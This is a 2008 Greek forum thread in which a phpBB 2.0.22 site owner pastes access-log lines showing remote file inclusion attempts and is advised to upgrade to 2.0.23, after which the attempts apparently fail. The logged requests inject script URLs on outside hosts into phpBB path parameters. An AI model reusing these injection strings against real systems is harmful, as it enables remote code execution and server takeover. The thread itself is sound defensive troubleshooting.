PHPBB και injections

Μια περιοχή για το phpBB, την δημοφιλή δωρεάν πλατφόρμα για forums

Συντονιστές: WebDev Moderators, Super-Moderators, PHP Moderators

Απάντηση
freds
Δημοσιεύσεις: 320
Εγγραφή: 24 Φεβ 2005 16:11

PHPBB και injections

Δημοσίευση από freds » 08 Ιούλ 2008 16:54

Γεια σας.

Θα ήθελα να ρωτήσω το εξής. Χρησιμοποιώ την εφαρμογή PHPBB 2.0.22. Παρατήρησα ότι στο log file του site μου παρουσιάζεται αρκετά συχνά κάτι σαν τα παρακάτω κείμενα.

Κώδικας: Επιλογή όλων

216.131.91.232 - - [07/Jul/2008:12:30:15 +0300] "GET /forum/album_showpage.php?pic_id=7//phpbb.inc.php?CFG[auth_phpbb_path]=http://www.prodemu.cl/Rem/r.txt?? HTTP/1.1" 200 10609 "-" "libwww-perl/5.811"
ή

Κώδικας: Επιλογή όλων

216.131.91.232 - - [07/Jul/2008:12:30:17 +0300] "GET /forum/album_showpage.php?pic_id=7//phpbb.inc.php?CFG[auth_phpbb_path]=http://tokiohotelpl.com/bp.txt?? HTTP/1.1" 200 10609 "-" "libwww-perl/5.811"
ή

Κώδικας: Επιλογή όλων

69.93.225.34 - - [07/Jul/2008:12:31:12 +0300] "GET /forum/album_showpage.php?pic_id=7//phpbb.inc.php?CFG[auth_phpbb_path]=http://www.condohoteltoronto.com/runs.txt? HTTP/1.1" 200 10609 "-" "libwww-perl/5.79"
ή

Κώδικας: Επιλογή όλων

/forum/album_showpage.php?pic_id=7/admin_rebuild_search.php?phpbb_root_path=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 200 10609 "-" "libwww-perl/5.805"

Αυτό από ότι διάβασα στο ίντερνετ είναι μια προσπάθεια για injection στον κώδικα, προσπάθεια hacking δηλαδή, αν κατάλαβα καλά. Αλλά δεν δίνουν λύση.

Μπορεί κάποιος να προτείνει κάτι. Γιατί με αυτό τον τρόπο μπορούν και στέλνουν spam μέσα από τον server και το domain μου και δεν ξέρω τι να κάνω.

Ευχαριστώ εκ των προτέρων.

Άβαταρ μέλους
Basilakis
PHP Moderator
Δημοσιεύσεις: 8574
Εγγραφή: 17 Νοέμ 2003 13:03
Τοποθεσία: Womans' Brain
Επικοινωνία:

PHPBB και injections

Δημοσίευση από Basilakis » 08 Ιούλ 2008 17:11

Αυτό που πρέπει να κάνεις είναι να αναβαθμιστείς σε 2.023.

freds
Δημοσιεύσεις: 320
Εγγραφή: 24 Φεβ 2005 16:11

PHPBB και injections

Δημοσίευση από freds » 08 Ιούλ 2008 17:17

Κατέβασα το αρχείο

phpbb-2.0.22_to_2.0.23.txt

Δεν το έχω περάσει ακόμα αλλά δεν ξέρω αν αυτό θα λύσει το πρόβλημα.

Θα προσπαθήσω πάντως να το περάσω.

Ευχαριστώ.

Άβαταρ μέλους
Basilakis
PHP Moderator
Δημοσιεύσεις: 8574
Εγγραφή: 17 Νοέμ 2003 13:03
Τοποθεσία: Womans' Brain
Επικοινωνία:

PHPBB και injections

Δημοσίευση από Basilakis » 08 Ιούλ 2008 17:25

Καλη επιτυχεία :)

freds
Δημοσιεύσεις: 320
Εγγραφή: 24 Φεβ 2005 16:11

PHPBB και injections

Δημοσίευση από freds » 08 Ιούλ 2008 18:37

Το αναβάθμισα στο 2.0.23.

Αυτό που μένει να δούμε τώρα πως θα αντιδράσει η εφαρμογή στις προσπάθειες αυτές.

Άβαταρ μέλους
cordis
Administrator, [F|H]ounder, [C|S]EO
Δημοσιεύσεις: 27616
Εγγραφή: 09 Οκτ 1999 03:00
Τοποθεσία: Greece
Επικοινωνία:

PHPBB και injections

Δημοσίευση από cordis » 08 Ιούλ 2008 18:38

δε θα σταματήσουν να προσπαθούν. Το θέμα είναι αν καταφέρνουν κάτι...
Δεν απαντάω σε προσωπικά μηνύματα με ερωτήσεις που καλύπτονται από τις ενότητες του forum. Για ο,τι άλλο είμαι εδώ για εσάς.
- follow me @twitter

Άβαταρ μέλους
Basilakis
PHP Moderator
Δημοσιεύσεις: 8574
Εγγραφή: 17 Νοέμ 2003 13:03
Τοποθεσία: Womans' Brain
Επικοινωνία:

PHPBB και injections

Δημοσίευση από Basilakis » 08 Ιούλ 2008 18:42

Ακριβώς

Τώρα το θέμα είναι να μας πείς εάν έχεις και κάποια modifications και εάν τα έχεις αναβαθμίσεις στην τελευταία version

freds
Δημοσιεύσεις: 320
Εγγραφή: 24 Φεβ 2005 16:11

PHPBB και injections

Δημοσίευση από freds » 09 Ιούλ 2008 15:46

Να πω την αλήθεια δεν έχω κάποια ιδιαίτερα modifications.

Πάντως από ότι φαίνεται τουλάχιστον μέχρι τώρα μετά την αναβάθμιση οι προσπάθειες τους δεν είχαν επιτυχία.

Απάντηση

Επιστροφή στο “phpBB”

Μέλη σε σύνδεση

Μέλη σε αυτήν τη Δ. Συζήτηση: Δεν υπάρχουν εγγεγραμμένα μέλη και 0 επισκέπτες